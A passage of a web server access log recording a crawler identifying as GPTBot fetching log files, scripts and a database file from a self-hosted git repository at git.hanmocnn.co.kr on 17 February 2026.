compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" +[17/Feb/2026:13:21:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" [Client 74.7.227.38] [Length 8192] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/my_database.db" +[17/Feb/2026:13:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33427] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23691] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 33396] [Gzip 6.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_stream_access.log" +[17/Feb/2026:13:21:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 33620] [Gzip 6.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:21:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35798] [Gzip 6.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:21:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 10957] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 38750] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" [Client 74.7.227.38] [Length 36011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.2" +[17/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:21:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" [Client 74.7.227.38] [Length 39264] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.5" +[17/Feb/2026:13:21:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:21:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" [Client 74.7.227.38] [Length 39193] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.1" +[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 23717] [Gzip 5.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:21:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:21:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.7" +[17/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" [Client 74.7.227.38] [Length 50188] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.3" +[17/Feb/2026:13:21:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 35827] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:13:21:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/types.ts" +[17/Feb/2026:13:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 10925] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" +[17/Feb/2026:13:21:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11360] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" +[17/Feb/2026:13:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 11394] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:21:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" [Client 74.7.227.38] [Length 22656] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.4" +[17/Feb/2026:13:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 16075] [Gzip 5.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:21:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 12950] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03" +[17/Feb/2026:13:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fassets%2fimages" [Client 74.7.227.38] [Length 19560] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images" +[17/Feb/2026:13:21:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 74.7.227.38] [Length 11442] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" [Client 74.7.227.38] [Length 42638] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/letsencrypt.log.6" +[17/Feb/2026:13:21:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 12971] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/update_status.py" +[17/Feb/2026:13:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13870] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components" +[17/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" [Client 74.7.227.38] [Length 2190] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs/fallback_error.log" +[17/Feb/2026:13:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 18949] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png" +[17/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 10136] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:13:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 18812] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:13:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" [Client 74.7.227.38] [Length 9855] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html" [Client 74.7.227.38] [Length 14233] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:13:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" [Client 74.7.227.38] [Length 14388] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:13:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 12999] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup" +[17/Feb/2026:13:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13652] [Gzip 5.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" +[17/Feb/2026:13:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py" +[17/Feb/2026:13:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" +[17/Feb/2026:13:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:13:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/mail_contact.py" +[17/Feb/2026:13:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" [Client 74.7.227.38] [Length 12476] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/update_status.py" +[17/Feb/2026:13:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/components/Hero.tsx" +[17/Feb/2026:13:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429.patch" [Client 74.7.227.38] [Length 1191] [Gzip -] [Sent-to 192.168.0.250] 